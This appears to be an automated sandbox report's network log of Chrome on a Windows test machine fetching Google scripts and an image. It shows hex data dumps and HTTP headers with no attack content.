                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 79 41 5a 59 65 49 4a 7a 39 61 5a 57 59 56 34 32 79 42 2f 31 54 54 48 73 77 33 46 4e 55 4c 6f 35 72 69 47 38 68 54 76 65 70 79 47 4c 35 4f 54 67 44 62 4a 77 4e 38 31 48 33 31 31 63 7a 33 55 61 53 39 45 77 4f 46 49 4f 43 6f 78 73 52 73 66 48 36 55 58 42 43 48 31 64 67 76 47 4d 62 6e 6e 39 4b 67 61 45 52 61 75 79 73 51 63 2f 69 55 2f 64 39 2f 77 43 58 7a 6f 37 64 32 54 6f 56 55 4b 57 73 74 57 44 4c 42 71 64 30 74 37 45 53 33 55 37 59 42 58 78 55 72 74 74 36 37 2b 58 47 4b 47 30 74 4a 34 65 31 4d 6b 38 53 6c 75 6d 48 70 4f 44 6a 48 58 6a 48 2f 45 2f 6c 56 72 31 4e 4f 6d 32 36 6b 50 47 34 39 61 57 36 61 49 32 6d 6c 5a 52 2f 45 39 67 4a 74 74 31 44 71 35 2b 44 59 71 76 4c 54 65 35 43 69 6b 68 30 53 57 47 35 34 50 4a 46 61 6f 78 36 53 43 54 75 64 7a 78 67 56 4f
                                                                                                                                                                                                                                                                                          Data Ascii: yAZYeIJz9aZWYV42yB/1TTHsw3FNULo5riG8hTvepyGL5OTgDbJwN81H311cz3UaS9EwOFIOCoxsRsfH6UXBCH1dgvGMbnn9KgaERauysQc/iU/d9/wCXzo7d2ToVUKWstWDLBqd0t7ES3U7YBXxUrtt67+XGKG0tJ4e1Mk8SlumHpODjHXjH/E/lVr1NOm26kPG49aW6aI2mlZR/E9gJtt1Dq5+DYqvLTe5Cikh0SWG54PJFaox6SCTudzxgVO
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 51 41 41 41 51 41 42 41 41 44 2f 32 77 43 45 41 41 6b 47 42 77 67 48 42 67 6b 49 42 77 67 4b 43 67 6b 4c 44 52 59 50 44 51 77 4d 44 52 73 55 46 52 41 57 49 42 30 69 49 69 41 64 48 78 38 6b 4b 44 51 73 4a 43 59 78 4a 78 38 66 4c 54 30 74 4d 54 55 33 4f 6a 6f 36 49 79 73 2f 52 44 38 34 51 7a 51 35 4f 6a 63 42 43 67 6f 4b 44 51 77 4e 47 67 38 50 47 6a 63 6c 48 79 55 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 2f 2f 41 41 42 45 49 41 46 41 41 55 41 4d 42 49 67 41 43 45 51 45 44 45 51 48 2f 78 41 41 62 41 41 41 44
                                                                                                                                                                                                                                                                                          Data Ascii: ge/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAFAAUAMBIgACEQEDEQH/xAAbAAAD
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 30 6f 79 45 6b 42 5a 4f 52 78 72 39 37 71 6e 69 4c 54 49 70 70 4e 4a 49 6a 67 4a 62 34 6d 4a 57 49 78 6a 31 63 39 4d 63 5a 50 32 56 48 58 45 47 56 4a 78 56 37 6f 65 70 61 6a 5a 57 30 6c 6e 59 77 77 7a 2b 5a 6c 78 46 49 68 59 73 63 44 49 47 43 4f 32 54 39 31 53 6c 2f 5a 7a 32 73 72 77 33 4d 44 77 53 44 6e 79 33 42 42 41 50 54 72 51 33 6a 4a 52 6b 72 44 38 64 6f 33 38 6e 57 73 63 35 76 6e 70 6e 53 4e 67 41 4f 4f 61 4b 67 59 75 57 39 4a 4f 31 53 78 78 37 41 5a 50 38 41 61 67 30 63 46 61 7a 75 58 64 30 52 49 47 5a 5a 48 62 41 32 48 42 78 33 70 55 6e 6f 68 6f 2b 53 69 73 4c 4f 57 38 73 58 75 37 66 42 56 4e 33 6f 2f 6d 79 42 6e 46 45 36 46 70 62 36 37 42 4c 4a 44 4d 73 66 6c 74 67 71 77 79 65 52 78 2b 76 34 56 4b 78 36 4e 71 6a 41 59 38 38 4b 77 33 66 58 41 2f
                                                                                                                                                                                                                                                                                          Data Ascii: 0oyEkBZORxr97qniLTIppNJIjgJb4mJWIxj1c9McZP2VHXEGVJxV7oepajZW0lnYwwz+ZlxFIhYscDIGCO2T91Sl/Zz2srw3MDwSDny3BBAPTrQ3jJRkrD8do38nWsc5vnpnSNgAOOaKgYuW9JO1Sxx7AZP8Aag0cFazuXd0RIGZZHbA2HBx3pUnoho+SisLOW8sXu7fBVN3o/myBnFE6Fpb67BLJDMsfltgqwyeRx+v4VKx6NqjAY88Kw3fXA/
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 51 41 41 41 51 41 42 41 41 44 2f 32 77 43 45 41 41 6b 47 42 77 67 48 42 67 6b 49 42 77 67 4b 43 67 6b 4c 44 52 59 50 44 51 77 4d 44 52 73 55 46 52 41 57 49 42 30 69 49 69 41 64 48 78 38 6b 4b 44 51 73 4a 43 59 78 4a 78 38 66 4c 54 30 74 4d 54 55 33 4f 6a 6f 36 49 79 73 2f 52 44 38 34 51 7a 51 35 4f 6a 63 42 43 67 6f 4b 44 51 77 4e 47 67 38 50 47 6a 63 6c 48 79 55 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 2f 2f 41 41 42 45 49 41 46 41 41 55 41 4d 42 49 67 41 43 45 51 45 44 45 51 48 2f 78 41 41 63 41 41 41 43
                                                                                                                                                                                                                                                                                          Data Ascii: ge/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAFAAUAMBIgACEQEDEQH/xAAcAAAC


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          35192.168.2.749780142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1622OUTGET /xjs/_/js/md=2/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 12020
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 06:23:17 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 06:23:17 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Age: 29881
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC561INData Raw: 7b 22 63 68 75 6e 6b 54 79 70 65 73 22 3a 22 31 30 30 30 30 31 31 31 31 31 31 31 30 30 31 31 31 31 30 30 30 31 30 30 30 30 31 30 31 31 30 31 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 30 31 31 31 31 31 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: {"chunkTypes":"100001111111001111000100001011010000001111111111111111111111111111111011011111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 32 32 32 32 32 31 32 32 31 32 32 31 32 31 31 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 32 31 32 32 31 32 32 31 32 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31
                                                                                                                                                                                                                                                                                          Data Ascii: 212121212121212121212121212121212121212121212121212221212121212121212221222222122122121112212121212121212121212121212121212221212121212121212121212121212121212121222212212212221221221221221221221221221221221221221221221221221221221221221221221221221221221
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 32 31 33 31 33 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111111111111121111111111111111111111131112131111111111111111111111111111111111111111131111131311111111111111111111111111111111112111111111111111111111111110111111111111111111111111111111111111113111111111111111111111111121111111121313112131111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 32 32 32 32 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 31 31 33 31 31 31 31 31 31 31 31 31 33 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 31 32 32 31 32 32 32 33 31 31 33 31 31 31 31 31 31 31 32 32 31 32 31 31 31 31 32 33 32 32 32 32 32 31 31 33 31 31 32 32 32 32 33 31 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 222211111113111111111111011111111111111111111111111111111111111111111111111111111111221131111111113133111111111111111111112122222222212222222221221222311311111112212111123222221131122223113131111111111111111111111111111111111111111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 31 31 31 31 32 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 32 32 32 32 32 32 32 32 31 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 31 32 32 31 31 32 32 31 31 32 32 32 31 31 31 32 31 31 31 31 32 32 32 31 32 32 32 31 31 32 32 32 32 32 32 32 32 32 31 31 32 32 31 32 32 32 32 32 32 31 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111121111211111111112222222222222222222211111122222222122221111111111111111111111111211111111111111111111212121121212121212121111111111121222222222222221212211221122211121111222122211222222222112212222221222222212222222222222222122222222221111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 33 31 32 32 31 33 32 33 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 33 32 32 32 32 32 31 32 32 32 32 32 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 32 32 32 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111111111111111111111111111111111111111111111111111131312213231111111112222222222222222222222222222222222222222222222222222222222222222222222222232222212222211111111131111111111111111111111121122212111111111111111111111111111111111111111111112111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 31 31 31 31 31 32 33 32 32 33 31 31 31 32 32 31 33 32 31 31 31 32 32 33 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 32 32 31 31 33 31 31 32 31 32 32 32 32 32 32 32 33 32 32 33 32 33 32 32 32 31 31 32 31 31 31 32 32 33 31 33 31 33 31 31 31 31 32 30 30 30 32 30 32 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 32 30 30 30 30 30 30 30 30 30 32 32 32 32 30 32 30 32 32 32 30 32 32 32 32 30 30 30 30
                                                                                                                                                                                                                                                                                          Data Ascii: 111112322311122132111223100000000000000000000000000000000000000000000200000000000000000000000000000000000000000001111111111111111111111111111111111111111111111222211311212222222322323222112111223131311112000202000000000000200020000000002222020222022220000
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC339INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 33 31 30 30 30 30 30 32 33 30 31 32 33 32 31 31 32 33 30 30 30 31 31 31 32 33 32 32 32 32 33 30 30 30 30 30 30 30 32 32 33 30 30 32 32 33 32 31 32 31 32 32 32 32 32 32 33 31 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 33 30 30 30 30 32 33 30 32 32 32 33 33 30 30 30 31 32 32 33 31 31 32 31 32 33 31 32 32 32 32 32 32 32 32 32 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 32 32 32 32 33 31 31 33 31 31 30 30 30 30 30 30 30 30 30 30 30 32 32 32 33 31 32 32 33 31 31 31 31 30 30 30 30 30 30 30 33 33 31 33 31 33 31
                                                                                                                                                                                                                                                                                          Data Ascii: 000000000000000000000000000011113111111111111111111111111111122310000023012321123000111232222300000002230022321212222223111111100000000000000022300002302223300012231121231222222222300000000000000000000000002222223113110000000000022231223111100000003313131


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          36192.168.2.749779142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1021OUTGET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ogs.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 2091
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:18 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:18 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
